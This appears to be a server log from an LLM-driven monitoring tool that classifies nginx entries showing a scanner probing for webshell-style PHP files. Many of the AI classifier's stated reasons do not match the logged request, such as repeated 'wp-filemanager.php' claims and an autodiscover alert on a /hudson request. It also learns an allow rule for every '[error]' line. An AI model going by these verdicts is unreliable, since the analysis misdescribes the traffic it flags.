Mar 20 14:08:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:56.823322 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:08:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:56.823363 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a likely PHP file (domains.php) resulting in a file-not-found error can indicate probing for sensitive endpoints or misconfigurations. Not clearly malicious, but warrants monitoring. Line=2026-03-20T13:59:03.536473180Z 2026/03/20 13:59:03 [error] 422#422: *750796 open() "/usr/share/nginx/default/domains.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, reques...
Mar 20 14:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:01.948062 [observer] Pipeline: processed=6126 pattern_hits=5719 llm_calls=407 llm_errors=3 learned=4
Mar 20 14:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:01.948091 [observer] Patterns: hash=5719 prefix=0 regex=0 contains=0 deny=68 alert=537 suppress=0 misses=407
Mar 20 14:09:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:03.836618 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:09:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:03.836662 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Open() failed for a non-existent file during an HTTP GET for byypas.php, indicative of probing for webshells or misconfigured paths. Line=2026-03-20T13:59:03.604413986Z 2026/03/20 13:59:03 [error] 422#422: *750796 open() "/usr/share/nginx/default/byypas.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request...
Mar 20 14:09:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:03.836730 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.604495650Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /byypas.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:09:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:10.789116 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:09:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:10.789179 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error indicating missing file install.php and a client from an external IP; could be probing for webshell or install script. Line=2026-03-20T13:59:03.672700110Z 2026/03/20 13:59:03 [error] 422#422: *750796 open() "/usr/share/nginx/default/install.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, reques...
Mar 20 14:09:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:10.789245 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.672707674Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /install.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:09:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:16.098760 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 14:09:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:16.098812 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 14:09:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:16.098927 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.741556969Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /myfile.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:09:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:24.418607 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:09:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:24.418645 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=NGINX error showing missing file grsiuk.php accessed by a client; could indicate a probing or misconfigured site attempting to access non-existent resources. Line=2026-03-20T13:59:03.809571412Z 2026/03/20 13:59:03 [error] 422#422: *750796 open() "/usr/share/nginx/default/grsiuk.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request...
Mar 20 14:09:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:24.418711 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.809643370Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /grsiuk.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:09:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:30.737093 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:09:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:30.737132 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Accessing a PHP file that does not exist (wp-p2r3q9c8k4.php) can indicate probing or misconfigured routing. Not definitive compromise, but warrants attention. Line=2026-03-20T13:59:03.911636714Z 2026/03/20 13:59:03 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp-p2r3q9c8k4.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, ...
Mar 20 14:09:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:30.737218 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.911650525Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp-p2r3q9c8k4.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:31.937317 [observer] Pipeline: processed=6136 pattern_hits=5724 llm_calls=412 llm_errors=3 learned=4
Mar 20 14:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:31.937341 [observer] Patterns: hash=5724 prefix=0 regex=0 contains=0 deny=68 alert=542 suppress=0 misses=412
Mar 20 14:09:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:34.529988 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:09:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:34.530027 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempt to access a WordPress PHP file that does not exist; could indicate probing for vulnerable paths. Line=2026-03-20T13:59:03.979409416Z 2026/03/20 13:59:03 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp-access.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, requ...
Mar 20 14:09:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:34.530087 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.979476124Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp-access.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:09:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:34.530116 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.057480779Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /inege.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:09:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:39.756408 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 14:09:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:39.756450 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Root cause: request to non-existent PHP file (inege.php) in default nginx directory. Could indicate probing or misconfiguration; enriched error shows unusual path name suggesting potential automated scanning. Line=2026-03-20T13:59:04.057476429Z 2026/03/20 13:59:04 [error] 422#422: *750796 open() "/usr/share/nginx/default/inege.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request:...
Mar 20 14:09:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:47.902584 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:09:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:47.902622 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error log shows an attempt to access a PHP file that does not exist, which can indicate probing or misconfiguration. Not conclusively malicious, but warrants monitoring. Line=2026-03-20T13:59:04.125395743Z 2026/03/20 13:59:04 [error] 422#422: *750796 open() "/usr/share/nginx/default/bgymj.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request:...
Mar 20 14:09:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:47.902685 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.125444868Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /bgymj.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:09:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:52.952106 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:09:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:52.952180 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Suspicious access to a random PHP file in nginx default directory with no such file; typical probe/scan behavior. Line=2026-03-20T13:59:04.193322046Z 2026/03/20 13:59:04 [error] 422#422: *750796 open() "/usr/share/nginx/default/6kDPjgFTmvS.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, re...
Mar 20 14:09:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:52.952247 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.193389478Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /6kDPjgFTmvS.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:09:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:57.568474 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:09:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:57.568510 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx open() failure for a PHP file under /tx78.php suggests a potential probe for PHP file execution or hidden admin scripts; common in scanning attempts. Line=2026-03-20T13:59:04.266907828Z 2026/03/20 13:59:04 [error] 422#422: *750796 open() "/usr/share/nginx/default/tx78.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:09:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:09:57.568598 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.267001308Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /tx78.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:01.958216 [observer] Pipeline: processed=6146 pattern_hits=5729 llm_calls=417 llm_errors=3 learned=4
Mar 20 14:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:01.958255 [observer] Patterns: hash=5729 prefix=0 regex=0 contains=0 deny=68 alert=547 suppress=0 misses=417
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.265032 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.265077 [analyzer] Learned prefix pattern for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo [allow]: "[error]"
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.265187 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.340482057Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /init.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.265325 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.408224106Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ws49.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.265404 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.479652118Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /56c53.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.265490 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.547521803Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /public/file.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.265567 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.615452651Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /144.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.265660 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.683130279Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /clss.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.265728 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.750825735Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /motu.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.265799 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.819475569Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ajax.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.265865 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.891633605Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /maul.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.265981 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:04.994499724Z 4.204.200.32 - - [20/Mar/2026:13:59:04 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /public/wp-blog.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.266058 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:05.062524979Z 4.204.200.32 - - [20/Mar/2026:13:59:05 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp-content/radio.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.266125 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:05.138844024Z 4.204.200.32 - - [20/Mar/2026:13:59:05 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /callback.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:02.266202 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:05.206500031Z 4.204.200.32 - - [20/Mar/2026:13:59:05 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /166.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:10:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:08.236544 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 14:10:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:08.236590 [analyzer] Confidence 0.80 too low for pattern learning (need 0.85+)
Mar 20 14:10:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:16.722633 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 14:10:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:16.722671 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 14:10:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:16.723482 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:10:00.973219217Z 172.202.118.18 - - [20/Mar/2026:14:10:00 +0000] "54.200.221.0" "GET /hudson HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-"
Mar 20 14:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:31.936600 [observer] Pipeline: processed=6244 pattern_hits=5825 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:10:31.936625 [observer] Patterns: hash=5811 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:11:01.952822 [observer] Pipeline: processed=6247 pattern_hits=5828 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:11:01.952857 [observer] Patterns: hash=5814 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:11:31.938496 [observer] Pipeline: processed=6251 pattern_hits=5832 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:11:31.938521 [observer] Patterns: hash=5818 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:12:01.973629 [observer] Pipeline: processed=6253 pattern_hits=5834 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:12:01.973659 [observer] Patterns: hash=5820 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:12:31.936432 [observer] Pipeline: processed=6257 pattern_hits=5838 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:12:31.936457 [observer] Patterns: hash=5824 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:13:01.985145 [observer] Pipeline: processed=6261 pattern_hits=5842 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:13:01.985372 [observer] Patterns: hash=5828 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:13:31.938655 [observer] Pipeline: processed=6263 pattern_hits=5844 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:13:31.938684 [observer] Patterns: hash=5830 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:14:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:14:02.146408 [observer] Pipeline: processed=6267 pattern_hits=5848 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:14:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:14:02.146472 [observer] Patterns: hash=5834 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:14:31.946530 [observer] Pipeline: processed=6269 pattern_hits=5850 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:14:31.946555 [observer] Patterns: hash=5836 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:15:01.950353 [observer] Pipeline: processed=6273 pattern_hits=5854 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:15:01.950381 [observer] Patterns: hash=5840 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:15:31.937581 [observer] Pipeline: processed=6275 pattern_hits=5856 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:15:31.937614 [observer] Patterns: hash=5842 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:16:01.952399 [observer] Pipeline: processed=6277 pattern_hits=5858 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:16:01.952444 [observer] Patterns: hash=5844 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:16:31.936390 [observer] Pipeline: processed=6281 pattern_hits=5862 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:16:31.936417 [observer] Patterns: hash=5848 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:17:01.945462 [observer] Pipeline: processed=6283 pattern_hits=5864 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:17:01.945492 [observer] Patterns: hash=5850 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:17:31.937032 [observer] Pipeline: processed=6287 pattern_hits=5868 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:17:31.937060 [observer] Patterns: hash=5854 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:18:01.956476 [observer] Pipeline: processed=6291 pattern_hits=5872 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:18:01.956511 [observer] Patterns: hash=5858 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:18:31.937117 [observer] Pipeline: processed=6295 pattern_hits=5876 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:18:31.937148 [observer] Patterns: hash=5862 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:19:01.949416 [observer] Pipeline: processed=6297 pattern_hits=5878 llm_calls=419 llm_errors=3 learned=5
